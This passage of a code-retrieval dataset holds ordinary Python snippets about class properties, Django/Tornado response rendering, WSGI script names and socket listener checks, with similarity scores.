{\n 'userid': self.user_id,\n 'title': self.get_fullname()\n }\n if not self.ogds_user:\n return properties\n\n for attribute_name in self.ogds_user_attributes:\n value = getattr(self.ogds_user, attribute_name)\n properties[attribute_name] = value\n return properties", "def init_attrs(self):\n raise NotImplementedError", "def populate(self, **kwargs):\n kwargs = _.omit(kwargs, Base.PUBLIC_PROPERTIES + ['key', 'id']) # We don't want to populate those properties\n kwargs = _.pick(kwargs, _.keys(self._properties)) # We want to populate only real model properties\n super(Base, self).populate(**kwargs)", "def useProperties(cls):\n def getter(name):\n def get(self):\n return self.property(name)\n return get\n def setter(name):\n def set(self, value):\n return self.setProperty(name, value)\n return set\n for name in iterProperties(cls):\n setattr(cls, name, property(getter(name), setter(name)))\n return cls", "def load_properties(self, meta):\n\t\t# doctype properties\n\t\tfor prop in doctype_properties:\n\t\t\tself.set(prop, meta.get(prop))\n\n\t\tfor d in meta.get(\"fields\"):\n\t\t\tnew_d = {\n\t\t\t\t\"fieldname\": d.fieldname,\n\t\t\t\t\"is_custom_field\": d.get(\"is_custom_field\"),\n\t\t\t\t\"is_system_generated\": d.get(\"is_system_generated\"),\n\t\t\t\t\"name\": d.name,\n\t\t\t}\n\t\t\tfor prop in docfield_properties:\n\t\t\t\tnew_d[prop] = d.get(prop)\n\t\t\tself.append(\"fields\", new_d)\n\n\t\tfor fieldname in (\"links\", \"actions\", \"states\"):\n\t\t\tfor d in meta.get(fieldname):\n\t\t\t\tself.append(fieldname, d)", "def _get_class_attributes(attributes, cls, properties, mapper_attrs, table_attributes):\n for attr in attributes:\n if attr.startswith('_'):\n continue\n if attr.endswith('_id'):\n continue\n if attr in ('metadata', 'query'):\n continue\n var = getattr(cls, attr)\n if callable(var):\n continue\n if isinstance(var, property):\n try:\n attr = '_' + attr\n var = getattr(cls, attr)\n properties.append(attr)\n except AttributeError as err:\n print('could not determin corresponding attribute for property {}'.format(var))\n continue\n if isinstance(var, InstrumentedAttribute):\n var = cast(InstrumentedAttribute, var)\n table_attributes[attr] = mapper_attrs[attr]", "def properties(self):\n raise NotImplementedError", "def properties(self):", "def properties(self):", "def properties(self):", "def get_properties(self):\n self.unimpl_base_class()", "def properties(self):\n pass", "def _properties(self) -> dict[str, dict[str, str]]:\n schema = self.schema(by_alias=False)\n if schema.get('properties') is not None:\n return schema.get('properties', {})\n return schema.get('definitions', {}).get(self.__class__.__name__, {}).get('properties', {})", "def getProperties():", "def prop(self, fn):\n if not callable(fn):\n fn = attrgetter(fn)\n self._keys.append(fn)\n self._sortKeys.append({})\n return self", "def create_property_on_class(self, cls, internal_name):\n if not self._use_custom_properties:\n if self._is_mutable:\n setter = partial(_setattr, internal_name)\n else:\n setter = None\n setattr(\n cls,\n self._name,\n property(\n partial(_getattr, internal_name),\n setter,\n None,\n self._description\n )\n )", "def properties(self, ctx: Context) -> Iterator[AnnotatedExpression]:\n if \"self\" in ctx.namespace:\n self_expr = ctx.namespace[\"self\"]\n if hasattr(self_expr.annotation.type, \"__annotations__\"):\n class_annotations = (\n self_expr.annotation.type.__annotations__\n ) # type: Mapping[str,Type]\n for attr_name, attr_type in class_annotations.items():\n yield AnnotatedExpression(\n ast.Attribute(\n value=ast.Name(id=\"self\", ctx=ast.Load()),\n attr=attr_name,\n ctx=ast.Load(),\n ),\n TypeAnnotation(attr_type, None),\n )", "def get_properties(self):\n return self.properties", "def pluck_attr(source: ObservableBase, prop: str) -> ObservableBase:\n\n return source.map(lambda x: getattr(x, prop))", "def _init_attributes(self):\n self.attr = {\n 'name': None,\n 'tags': [],\n 'openHours': None,\n 'type': None,\n 'parent': None,\n 'locationId': None,\n 'bannerAbbreviation': None,\n 'arcGisAbbreviation': None,\n 'geoLocation': None,\n 'geometry': None,\n 'summary': None,\n 'description': None,\n 'descriptionHtml': None,\n 'address': None,\n 'city': None,\n 'state': None,\n 'zip': None,\n 'county': None,\n 'telephone': None,\n 'fax': None,\n 'thumbnails': [],\n 'images': [],\n 'departments': [],\n 'website': None,\n 'sqft': None,\n 'calendar': None,\n 'campus': None,\n 'girCount': None,\n 'girLimit': False,\n 'girLocations': None,\n 'synonyms': [],\n 'bldgId': None,\n 'parkingZoneGroup': None,\n 'propId': None,\n 'adaParkingSpaceCount': None,\n 'motorcycleParkingSpaceCount': None,\n 'evParkingSpaceCount': None,\n 'weeklyMenu': None,\n 'notes': None,\n 'labels': {},\n 'steward': None,\n 'shape': {}\n }", "def __init__(self):\n self.properties = {}", "def proxied_attribute(local_attr, proxied_attr, doc):\n def fget(self):\n return getattr(getattr(self, local_attr), proxied_attr)\n def fset(self, value):\n setattr(getattr(self, local_attr), proxied_attr, value)\n def fdel(self):\n delattr(getattr(self, local_attr), proxied_attr)\n return property(fget, fset, fdel, doc)", "def __properties__(self) -> dict:\r\n parameters = [\r\n d for d in dir(self) if (d[0] != \"_\") and (d.count(\"set\") == 0)\r\n and (d.count(\"_c\") == 0) and (d.count(\"_f\") == 0)\r\n ]\r\n\r\n return self.__as_json__(parameters)" ]
[ "0.70922816", "0.6685102", "0.6428715", "0.6299822", "0.6247607", "0.5921087", "0.5776609", "0.5761453", "0.57289666", "0.56989306", "0.5629627", "0.56074035", "0.5563408", "0.55521804", "0.55443585", "0.55443585", "0.55443585", "0.5507907", "0.547553", "0.5448069", "0.5433604", "0.5412133", "0.5388402", "0.5375684", "0.5363826", "0.53331125", "0.53291065", "0.53186446", "0.5294933", "0.528696" ]
0.7106498
0
Render a Django response and finish up this request. You'll need to call this if the view function/method is a coroutine.
def render(self, response): logger.debug("TornadoRequest::render") response = self._handler.finish_response(self, response) logger.debug("response: Finished")
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def finish_response(self, request, response):\n logger.debug(\"TornadoHandler::finish_response\")\n\n try:\n response = self._render_template(request, response)\n except Exception as e:\n return self._handle_response_exception(request, response, e)\n\n try:\n self._apply_response_middleware(request, response)\n except: # Any exception should be gathered and handled\n signals.got_request_exception.send(sender=self.__class__, request=request)\n response = self.handle_uncaught_exception(request, resolver, sys.exc_info())\n\n self._tornado_request_handler.django_finish_request(response)\n\n self._response_finished = True\n return response", "def render(self, request):\r\n response = LoudWSGIResponse(\r\n self._reactor, self._threadpool, self._application, request)\r\n response.start()\r\n return NOT_DONE_YET", "def serve(self, request):\n view = self.view.as_view()\n response = view(request)\n\n try:\n # HttpResponseRedirect does not have context_data\n\n response.context_data['page'] = self\n response.context_data['self'] = self\n\n except AttributeError:\n pass\n\n return response", "def finalize_response(self, request, response, *args, **kwargs):\n\t\t# Make the error obvious if a proper response is not returned\n\t\tassert isinstance(response, BaseResponse), (\n\t\t\t'Expected a `Response` object '\n\t\t\t'to be returned from the view, but received a `%s`'\n\t\t\t% type(response)\n\t\t)\n\t\treturn response", "def get_final_response(self,request,response):\n return response", "def process_response(self, request, response):\n return response", "def process_response(self, request, response):\n return response", "def render_response(self, *args, **kwargs):\n if self.template_name is not None:\n template = get_template(loader, self.template_name)\n self.response.write(template.render(**self.get_context(*args, **kwargs)))\n else:\n raise ValueError('No template provided.')", "def get_response(self, request):\n view = self.get_view()\n # Call its view with the request and this model.\n return view(request, flexible_page=self)", "def render_response(self, context, result):\n\t\tcontext.response = result\n\t\treturn True", "def respond(self, request):\n self.prepare(request)\n try:\n self.process(request)\n return self.get_response(request)\n finally:\n self.finalize()", "def process_response(self, request, response):\n\n # Cause dynamic responses to be rendered\n if isinstance(response, DynamicResponse):\n return response.render_response(request, response)\n\n return response", "def process_response(self, request, response):\n if request.headers.get('x-requested-with') == 'XMLHttpRequest':\n return render_to_json(response)\n return response", "def post(self, request, *args, **kwargs):\n return self.render_to_response(self.get_context_data())", "def render(self, *a, **kw):\r\n try:\r\n res = Wrapped.render(self, *a, **kw)\r\n if is_api():\r\n res = json_respond(res)\r\n elif self.space_compress:\r\n res = spaceCompress(res)\r\n c.response.content = res\r\n except NoTemplateFound, e:\r\n # re-raise the error -- development environment\r\n if g.debug:\r\n s = sys.exc_info()\r\n raise s[1], None, s[2]\r\n # die gracefully -- production environment\r\n else:\r\n abort(404, \"not found\")\r\n return c.response", "def render_to_response(self, context):\n\t\treturn self.get_json_response(self.convert_context_to_json(context))", "def render_to_response(self, context, **response_kwargs):\n return self.response_class(\n request = self.request,\n template = self.get_template_names(),\n context = context,\n **response_kwargs\n )", "def render(self, request):\n content = request.content.read()\n msg = json.loads(content)\n d = self.engine_bus.handleRequest(self.access_id, msg)\n d.addCallback(self._success, request)\n d.addErrback(self._fail, request)\n return server.NOT_DONE_YET", "def render_to_response(template, context, request, *args, **kwargs):\n from django.shortcuts import render_to_response as rtr\n from django.template import RequestContext\n return rtr(template, context, context_instance=RequestContext(request), *args, **kwargs)", "def make_response(self, request, response, **response_kwargs):\n while iscoroutine(response):\n response = yield from response\n\n if isinstance(response, StreamResponse):\n return response\n\n response_kwargs.setdefault('content_type', 'application/json')\n\n return Response(text=dumps(response), **response_kwargs)", "def render_to_response(self, context):\n return self.get_json_response(self.convert_context_to_json(context))", "def render_to_response(filename, context=None, request=None, mimetype=settings.DEFAULT_CONTENT_TYPE):\n rendered = render_to_string(filename, context, request)\n settings.timer.clear()\n return HttpResponse(rendered,mimetype=mimetype)", "def deferred_response(response, request):\n request.write(simplejson.dumps(response))\n request.finish()", "def render_to_response(self, context, **response_kwargs):\n if self.request.is_ajax():\n template = self.page_template\n else:\n template = self.get_template_names()\n return self.response_class(\n request=self.request,\n template=template,\n context=context,\n **response_kwargs\n )", "def _process_response(self, request, response):\n if http_utils.is_ajax(request) and hasattr(request, 'horizon'):\n queued_msgs = request.horizon['async_messages']\n if type(response) == http.HttpResponseRedirect:\n # Drop our messages back into the session as per usual so they\n # don't disappear during the redirect. Not that we explicitly\n # use django's messages methods here.\n for tag, message, extra_tags in queued_msgs:\n getattr(django_messages, tag)(request, message, extra_tags)\n if response['location'].startswith(settings.LOGOUT_URL):\n redirect_response = http.HttpResponse(status=401)\n # This header is used for handling the logout in JS\n redirect_response['logout'] = True\n if self.logout_reason is not None:\n utils.add_logout_reason(\n request, redirect_response, self.logout_reason,\n 'error')\n else:\n redirect_response = http.HttpResponse()\n # Use a set while checking if we want a cookie's attributes\n # copied\n cookie_keys = {'max_age', 'expires', 'path', 'domain',\n 'secure', 'httponly', 'logout_reason'}\n # Copy cookies from HttpResponseRedirect towards HttpResponse\n for cookie_name, cookie in response.cookies.items():\n cookie_kwargs = dict((\n (key, value) for key, value in cookie.items()\n if key in cookie_keys and value\n ))\n redirect_response.set_cookie(\n cookie_name, cookie.value, **cookie_kwargs)\n redirect_response['X-Horizon-Location'] = response['location']\n upload_url_key = 'X-File-Upload-URL'\n if upload_url_key in response:\n self._copy_headers(response, redirect_response,\n (upload_url_key, 'X-Auth-Token'))\n return redirect_response\n if queued_msgs:\n # TODO(gabriel): When we have an async connection to the\n # client (e.g. websockets) this should be pushed to the\n # socket queue rather than being sent via a header.\n # The header method has notable drawbacks (length limits,\n # etc.) and is not meant as a long-term solution.\n response['X-Horizon-Messages'] = json.dumps(queued_msgs)\n return response", "def json_response(self, request, *args, **kwargs):\n\n return HttpResponse(self.construct_json(),\n content_type='application/json',\n mimetype='application/json', status=self.status)", "def render_to_response(self, request, context, **response_kwargs):\n return TemplateResponse(\n request=request,\n template=self.get_template_name(),\n context=context,\n **response_kwargs\n )", "def render_to_response(self, context, **response_kwargs):\n return JsonResponse(context)", "def render_response(template, *args, **kwargs):\n\treturn render_template(template, *args, user=current_user(), **kwargs)", "def post(self, request, *args, **kwargs):\n return render(request, self.template_name, self.get_context_data(**kwargs))" ]
[ "0.734545", "0.7148183", "0.6868576", "0.6828342", "0.66384035", "0.6576349", "0.6576349", "0.6488101", "0.64071804", "0.63726956", "0.63658375", "0.6342019", "0.63327676", "0.6281047", "0.62706876", "0.62440646", "0.6232727", "0.61879945", "0.6183402", "0.6164196", "0.6162728", "0.6146056", "0.61459357", "0.6130997", "0.61192435", "0.60772055", "0.6066321", "0.6059683", "0.60548943", "0.60439533" ]
0.7349427
0
Convenience wrapper for the Tornado request's write() method.
def write(self, chunk): return self.tornado_request.write(chunk)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def write(self, *args, **kwargs):\n\n self.response.out.write(*args, **kwargs)", "def write(self, *a, **kw):\n self.response.out.write(*a, **kw)", "def write(self, *a, **kw):\n self.response.out.write(*a, **kw)", "def write(self, *a, **kw):\n self.response.out.write(*a, **kw)", "def write(self, *a, **kw):\n self.response.out.write(*a, **kw)", "def write(self, *a, **kw):\n self.response.out.write(*a, **kw)", "def Write(self, request, global_params=None):\n config = self.GetMethodConfig('Write')\n return self._RunMethod(\n config, request, global_params=global_params)", "def Write(self, request, global_params=None):\n config = self.GetMethodConfig('Write')\n return self._RunMethod(\n config, request, global_params=global_params)", "def write_request(self, request):\n msg = self.serialise_cbor_request(request)\n written = 0\n while written < len(msg):\n written += self.write(msg[written:])", "def stream(self, write, request):\n raise NotImplementedError(\"%s.stream\" % reflect.qual(self.__class__))", "def _make_http_request_write(self, path, *args, **kwargs):\n url = self.url_base + path\n self._invalidate_http_cache()\n return self._perform_http_request(url, *args, **kwargs)[2]", "def write(self, chunk):\r\n if not self.started_response:\r\n raise AssertionError(\"WSGI write called before start_response.\")\r\n \r\n if not self.sent_headers:\r\n self.sent_headers = True\r\n self.send_headers()\r\n \r\n if self.chunked_write and chunk:\r\n buf = [hex(len(chunk))[2:], \"\\r\\n\", chunk, \"\\r\\n\"]\r\n self.sendall(\"\".join(buf))\r\n else:\r\n self.sendall(chunk)", "def writeResponse(response):", "def write(fd, name, *args, version=None, **kwargs):\n\treturn access('write', fd, name, *args, version=version, **kwargs)", "def write( data ):", "def serialize_request(self, request, headers):\n content = self._write_content(request)\n headers.update({'Content-Length': str(len(content))})\n return content", "def base_write(self, write_method: Callable, data: DataDict,\n use_handle: bool):\n if use_handle:\n self._handle.seek(0)\n serialized = write_method(data, **self.kwargs)\n self._handle.write(serialized)\n self._handle.flush()\n os.fsync(self._handle.fileno())\n self._handle.truncate()\n else:\n write_method(self, data, **self.kwargs)", "def write(self, *args):\n\n self._write(self._out, *args)", "def __write(self, data):\n return self.__descriptor.write(data.encode(\"utf-8\") + b'\\n')", "def write():\n pass", "async def emit(self, data):\n if type(data) is not str:\n serialized_data = json.dumps(data)\n else:\n serialized_data = data\n try:\n self.write(f\"data: {serialized_data}\\n\\n\")\n await self.flush()\n except StreamClosedError:\n app_log.warning(\"Stream closed while handling %s\", self.request.uri)\n # raise Finish to halt the handler\n raise Finish()", "def write(self, arg, **kwargs):\r\n if hasattr(arg, 'seek'):\r\n self._tofile(arg, **kwargs)\r\n else:\r\n with open(arg, 'wb') as fid:\r\n self._tofile(fid, **kwargs)", "def writer(name, version=None, mimetype=None):\n\treturn _data_processor('write', name, version, mimetype)", "def write(self,data):\n self.body=self.body+data\n if end_of_header_search(self.body) >= 0:\n headers=self.headers\n if headers.has_key('content-length'):\n del headers['content-length']\n if not self.headers.has_key('content-type'):\n self.setHeader('content-type', 'text/html')\n self.insertBase()\n body=self.body\n self.body=''\n self.write=write=self.stdout.write\n try: self.flush=self.stdout.flush\n except: pass\n write(str(self))\n self._wrote=1\n write('\\n\\n')\n write(body)", "def write( chunk, callback=None ):", "def post(self, **kwargs):\n data = request.json\n return save_new_writer(data=data)", "def _write(self, data):\n self._writer.write(data)", "def write(data):", "def write(self, data):\n return self._write(self.wfile, data)", "def write(self, out):" ]
[ "0.7011142", "0.6603937", "0.6603937", "0.6603937", "0.6603937", "0.6603937", "0.6459584", "0.6459584", "0.6424561", "0.6364683", "0.57424295", "0.5591314", "0.5554613", "0.5515465", "0.5395379", "0.5374757", "0.5356486", "0.5350801", "0.5335824", "0.53176373", "0.52599496", "0.5257619", "0.52323526", "0.52159405", "0.5213933", "0.51957476", "0.5186017", "0.5185007", "0.51797754", "0.5171676" ]
0.7030209
0
Convenience wrapper for the Tornado request's finish() method.
def finish(self): return self.tornado_request.finish()
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def RequestHandler_finish(self):\n if self.request._oboe_finish_ev and self.request._oboe_ctx and self.request._oboe_ctx.is_valid():\n ev = self.request._oboe_finish_ev\n ctx = self.request._oboe_ctx\n if hasattr(self, 'get_status'): # recent Tornado\n ev.add_info(\"Status\", self.get_status())\n elif hasattr(self, '_status_code'): # older Tornado\n ev.add_info(\"Status\", self._status_code)\n\n ev.add_edge(oboe.Context.get_default())\n ctx.report(ev)\n\n # clear the stored oboe event/metadata from the request object\n self.request._oboe_ctx = None\n self.request._oboe_finish_ev = None", "def finish_response(self, request, response):\n logger.debug(\"TornadoHandler::finish_response\")\n\n try:\n response = self._render_template(request, response)\n except Exception as e:\n return self._handle_response_exception(request, response, e)\n\n try:\n self._apply_response_middleware(request, response)\n except: # Any exception should be gathered and handled\n signals.got_request_exception.send(sender=self.__class__, request=request)\n response = self.handle_uncaught_exception(request, resolver, sys.exc_info())\n\n self._tornado_request_handler.django_finish_request(response)\n\n self._response_finished = True\n return response", "def onfinish( request ):", "def onfinish( request ):", "def AsyncHTTPClient_finish(request, callback=None, headers=None):\n if hasattr(callback, '_oboe_ctx'): # wrapped callback contains md\n ev = callback._oboe_ctx.create_event('exit', 'cURL') # adds edge to md\n if hasattr(request, '_oboe_ctx'): # add edge to entry event for this async HTTP call\n ev.add_edge(request._oboe_ctx)\n mdobj = callback\n\n elif hasattr(request, '_oboe_ctx'): # callback contains no metadata, but request obj does\n ev = request._oboe_ctx.create_event('exit', 'cURL')\n mdobj = request\n\n else: # no metadata found\n return\n\n if headers and hasattr(headers, 'get') and headers.get('X-Trace', None):\n response_md = headers.get('X-Trace')\n ev.add_edge_str(response_md) # add response X-Trace header\n\n mdobj._oboe_ctx.report(ev) # increments metadata in mdobj", "def done(self):\n ## All done with the request object\n self.closed = True\n self.d.callback('')", "def finish_request(self, request, client_address):\n\t\tself.RequestHandlerClass(request, client_address, self)", "def end_request(self, environ):\n pass", "def finish_successful_request(self):\n self.session_manager.finish_successful_request()", "def close_request(self, request):\n\t\tpass", "def finalize_response(self, request, response, *args, **kwargs):\n\t\t# Make the error obvious if a proper response is not returned\n\t\tassert isinstance(response, BaseResponse), (\n\t\t\t'Expected a `Response` object '\n\t\t\t'to be returned from the view, but received a `%s`'\n\t\t\t% type(response)\n\t\t)\n\t\treturn response", "def close_request(self, request):\n\t\trequest.close()", "def end(response):\n if isinstance(response.response, ClosingIterator):\n return response\n\n diff = time.time() - request.start\n del request.start\n\n if response.response:\n response.response[0] = response.response[0].replace('__EXECUTION_TIME__', '{:.3}'.format(diff))\n response.headers[\"content-length\"] = len(response.response[0])\n\n return response", "def done(self, request):\n raise NotImplementedError(\"Your %s class has not defined a done() \" \\\n \"method, which is required.\" \\\n % self.__class__.__name__)", "def cb_request_done(result):\n self._current_request = None\n return result", "def finish ( self ) :\n raise AbstractMethodException( self , \"finish\" )", "def finish(self) -> None:\n self.__exit__(None, None, None)", "def render(self, response):\n logger.debug(\"TornadoRequest::render\")\n response = self._handler.finish_response(self, response)\n logger.debug(\"response: Finished\")", "def exit(self) -> None:\n\n self.result = self.handle_success('finished-task')", "def end():\n\tdata = bottle.request.json\n\t#print(\"END:\", json.dumps(data))\n\treturn HTTPResponse(status=200)", "def finish(self):\n self.body.finish()", "def finish():", "def finish():", "def finish():", "def finish():", "def set_finish_callback( callback ):", "def set_finish_callback( callback ):", "def _request_finished_handler(self):\n handler = HandlerWrapper('.handlers:request_finished_handler', None)\n exc_handler = HandlerWrapper(self.get_setting('handler.exc'), handler)\n return exc_handler", "def handle_finished (self):\n\n print self.in_headers\n print self.in_cookies\n print self.content_type\n print self.content_encoding\n print self.response_code\n print self.is_allowing_persistence\n print self.content", "def onfinish():" ]
[ "0.6845464", "0.65772814", "0.6546038", "0.6546038", "0.64914596", "0.643756", "0.64001775", "0.6219688", "0.6184029", "0.6064755", "0.6025992", "0.5989794", "0.5957331", "0.5918375", "0.579136", "0.57792234", "0.5768139", "0.57536525", "0.57431555", "0.5708127", "0.569587", "0.5684539", "0.5684539", "0.5684539", "0.5684539", "0.56694967", "0.56694967", "0.56146973", "0.561312", "0.55677557" ]
0.7975853
0
Returns the equivalent of the HTTP request's SCRIPT_NAME header variable. If Apache mod_rewrite has been used, returns what would have been the script name prior to any rewriting (so it's the script name as seen from the client's perspective), unless the FORCE_SCRIPT_NAME setting is set (to anything).
def get_script_name(t_req): if settings.FORCE_SCRIPT_NAME is not None: return force_text(settings.FORCE_SCRIPT_NAME) # If Apache's mod_rewrite had a whack at the URL, Apache set either # SCRIPT_URL or REDIRECT_URL to the full resource URL before applying any # rewrites. Unfortunately not every Web server (lighttpd!) passes this # information through all the time, so FORCE_SCRIPT_NAME, above, is still # needed. script_url = t_req.headers.get('SCRIPT_URL', '') if not script_url: script_url = t_req.headers.get('REDIRECT_URL', '') if script_url: path_info = t_req.headers.get('PATH_INFO', '') script_name = script_url[:-len(path_info)] else: script_name = t_req.headers.get('SCRIPT_NAME', '') # It'd be better to implement URI-to-IRI decoding, see #19508. # return script_name.decode(UTF_8) return script_name
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def getScriptname():\n return os.environ.get('SCRIPT_NAME', '')", "def get_current_request_hostname():\r\n hostname = None\r\n request = get_current_request()\r\n if request:\r\n hostname = request.META.get('HTTP_HOST')\r\n\r\n return hostname", "def get_wsgi_file_name(self):\n return self.wsgi", "def get_host(req):\n return req.META[\"HTTP_HOST\"].split(\":\")[0]", "def get_wsgi_full_file_name(self):\n return posixpath.join(self.get_wsgi_dir(), self.get_wsgi_file_name())", "def request_host(request):\n host = urlsplit(request.url).hostname\n if host == \"\":\n host = request.get_header(\"Host\", \"\").partition(\":\")[0]\n\n # remove port, if present\n return host.lower()", "def get_scriptname(fname):\n base = os.path.basename(fname)\n res = os.path.splitext(base)[0]\n return res", "def gethandlername(URL):\n match = re.search(\"/([a-zA-Z0-9_-]+)\\.prog($|/|\\?)\", URL)\n if not match:\n # Couldn't find the requested module\n raise404(\"Couldn't find a module name in URL \" + URL)\n return match.group(1)", "def host(self):\r\n return self._environ.get('HTTP_HOST', '')", "def get_uri_prefix() -> str:\n Config.__get()\n assert Config.__config is not None\n return Config.__config.get(\"wsgi\", \"uri_prefix\").strip()", "def get_host(request):\n return request.META[\"HTTP_HOST\"].split(\":\")[0]", "def host(self):\n return self._environ.get('HTTP_HOST', '')", "def getBaseURL():\n return getQualifiedURL(getScriptname())", "def gettoolname(request):\n uri = ''\n if request.uri:\n uri = request.uri\n else:\n uri = request.url\n return urllib.parse.urlparse(uri).path.split('/')[1]", "def get_raw_server_name():\n from google.appengine.api import app_identity\n return '%s.%s.appspot.com' % (os.environ[\n 'CURRENT_VERSION_ID'].split('.')[0], app_identity.get_application_id())", "def ServerHostName(self):\n if self.force_auto_sync:\n self.get('ServerHostName')\n return self._ServerHostName", "def get_http_path_prefix():\n return os.path.join(CONF.deploy.http_root, '')", "def get_filename(self, headers):\n header = headers.get('content-disposition')\n\n if header is not None:\n _, params = cgi.parse_header(header)\n filename = params.get('filename')\n else:\n try:\n filename = self.parsed.path.split('/')[-1]\n except IndexError:\n filename = None\n\n return filename if filename is not None else self.DEFAULT_FILENAME", "def org_apache_felix_http_name(self) -> ConfigNodePropertyString:\n return self._org_apache_felix_http_name", "def get_mod_name():\n return sys.argv[0].split(\"/\")[-1].split(\".py\")[0]", "def gethostname():\n if socket.gethostname().find('.') >= 0:\n host = socket.gethostname()\n else:\n host = socket.gethostbyaddr(socket.gethostname())[0]\n return host", "def sockname(self):\n return self.socket_.getsockname()", "def getsockname(self):\r\n return self.sock.getsockname()", "def getsockname(self):\n return self.sock.getsockname()", "def PyHiew_GetScriptFileName(script):\r\n return '%s\\\\%s.py' % (PYHIEW_PATH, script)", "def url_prefix(self):\n return self._url_prefix", "def get_siteprefix(self):\n return self.siteprefix", "def GetApacheServerHost():\n host = None\n # Gets (scheme, host, port) from ServerName directive.\n match = MatchPattern(\n GEHTTPD_CONF_PATH,\n r\"^ServerName\\s+(?:(https?)://)?\"\n r\"((?:[\\da-zA-Z-]+)(?:\\.(?:[\\da-zA-Z-]+)){1,5})(?::(\\d+))?\")\n\n if match and (match[1] not in [\"localhost\", \"127.0.0.1\"]):\n host = match[1]\n\n if not host:\n host = GetServerHost()\n\n assert host\n return host", "def get_hostname():\n return re.split(\"\\.\", env.host)[0]", "def get_script_name(self, locale: Locale | str | None = None) -> str | None:\n if locale is None:\n locale = self\n locale = Locale.parse(locale)\n return locale.scripts.get(self.script or '')" ]
[ "0.74698013", "0.64156264", "0.6333524", "0.5728996", "0.5704559", "0.551568", "0.5501407", "0.54212606", "0.5419497", "0.54038095", "0.5375227", "0.52965987", "0.5247907", "0.5221188", "0.5179678", "0.5173248", "0.5162168", "0.514716", "0.5140043", "0.5136708", "0.51301867", "0.50970536", "0.50841177", "0.50709295", "0.5064584", "0.5043065", "0.5040198", "0.5039459", "0.50316447", "0.50310695" ]
0.82943535
0
More proper boolean operator for easier reading. return 1 Indicate a found listener return 0 Indicates nobody listening
def is_listening(port): return not listening(port)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def isListening(self):\n if not self.proxy:\n self.proxy = self.session.service(\"ALExpressiveListening\")\n return self.proxy.isListening()", "def listening(self):\n return self._server is not None", "def available(self):\n from pyhs3 import STATE_LISTENING\n return self._connection.api.state == STATE_LISTENING", "async def listen(self, maddr: Multiaddr) -> bool:", "def listening(self, ctxt):\n return True", "def is_alive(self):\n if (self._s.fileno()>0 and self._running and self._listen):\n return True\n else:\n return False", "def open_listener(self):\n\n try:\n self.listener = Listener((self.host, self.port))\n self.startup_success = True\n log.info(\"listening on '%s', %s\", self.host, self.port)\n except:\n self.startup_success = False\n log.exception(\"Could not bind socket '%s', %s\", self.host, self.port)\n\n self.startup.set()\n return self.startup_success", "def start_a_listener():\n listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n listener.bind(('', 0))\n return listener, listener.getsockname()", "def status(self):\n pid = self.pid()\n if pid is None or not pid_exists(pid):\n return False\n\n process = Process(pid)\n try:\n for connection in process.connections():\n if connection.status == 'LISTEN' and \\\n connection.laddr[1] == self.port:\n return True\n except AccessDenied:\n return False\n\n return False", "def _check_rac_listener(cfg, warning=None, critical=None):\n bin_name = \"lsnrctl\"\n _check_attrs(cfg, [\"sid\", \"oh\"])\n bin_name = os.path.join(cfg.oh, \"bin\", bin_name)\n regex = re.compile(r'Instance \"{0}\\d*\", status READY, has 1 handler\\(s\\) for this service...'.format(cfg.sid))\n\n try:\n os.environ[\"ORACLE_HOME\"] = cfg.oh\n args = bin_name + \" status\"\n cp = subprocess.run(args, shell=True, check=True, stdout=subprocess.PIPE)\n if cp.stdout is None:\n print(\"None result from lsnrctl status\")\n return UNKNOWN\n out = str(cp.stdout, \"utf-8\")\n ready = False\n msg = \"Service {0} has 0 listener status is READY\".format(cfg.sid)\n for l in out.split(os.linesep):\n if regex.search(l.lstrip().rstrip()):\n ready = True\n msg = l\n break\n\n print(msg)\n return OK if ready else CRITICAL\n except subprocess.CalledProcessError as err:\n print(err.output)\n return UNKNOWN", "def udp_listening(port):\n return (\n subprocess.call(\n udp_listening_cmd(port).split(),\n stdin=DEVNULL,\n stdout=DEVNULL,\n stderr=DEVNULL,\n close_fds=True,\n )\n == 0\n )", "def is_port_listening(port):\n with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n result = s.connect_ex((\"127.0.0.1\", port))\n return result == 0", "def start_a_listener():\n listener = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n listener.bind(('localhost', 0))\n return listener, listener.getsockname()", "def begin_listening(self):\n print(responses.STATUS_STARTING_TO_LISTEN)\n sockets = [self.english_sc, self.maori_sc, self.german_sc]\n\n try:\n incoming, outgoing, exceptions = select.select(sockets, [], [])\n\n if incoming[0] == self.english_sc:\n self.process_incoming(\n incoming[0], self.english_sc, self.ports['English'])\n return True\n\n elif incoming[0] == self.maori_sc:\n self.process_incoming(\n incoming[0], self.maori_sc, self.ports['Te reo Maori'])\n return True\n\n elif incoming[0] == self.german_sc:\n self.process_incoming(\n incoming[0], self.german_sc, self.ports['German'])\n return True\n\n else:\n print(responses.ERROR_FOREIGN_PORT)\n return False\n\n except:\n print(responses.ERROR_NO_SOCKET)\n return False", "def is_server_listening(self):\n self.log.info('Checking if the server is listening on TCP port {}'.format(self.upm_port))\n is_listening = connectivity.is_host_listening_tcp(host_address=self.upm_host,\n tcp_port=self.upm_port)\n if not is_listening:\n message = \"The server is not listening on TCP port {}\".format(self.upm_port)\n assert False, message\n self.log.info('The server is listening on TCP port {}'.format(self.upm_port))\n return True", "def test_subscribe_one_listener(self):\n def listener():\n pass\n EVENT_MANAGER.subscribe('test_listener', listener)\n self.assertIn(listener, EVENT_MANAGER._listeners['test_listener'])", "async def listened(self, value=None):\n pass", "def is_ready(self, addr: int, /) -> bool:", "def tcp_listening(port):\n return (\n subprocess.call(\n tcp_listening_cmd(port).split(),\n stdin=DEVNULL,\n stdout=DEVNULL,\n stderr=DEVNULL,\n close_fds=True,\n )\n == 0\n )", "def listen(self):\n pass", "def is_registered(self, event_type, callback, details_filter=None):\n listeners = self._topics.get(event_type, [])\n for listener in listeners:\n if listener.is_equivalent(callback, details_filter=details_filter):\n return True\n return False", "async def is_listened(self, ctx, id: int = None):\n if id is None:\n id = ctx.channel.id\n if id in self.etrigs['channels']:\n await ctx.send(f'Channel {self.bot.get_channel(id).mention} *is* being listened to for etriggers')\n else:\n await ctx.send(f'Channel {self.bot.get_channel(id).mention} *is **not*** being listened to 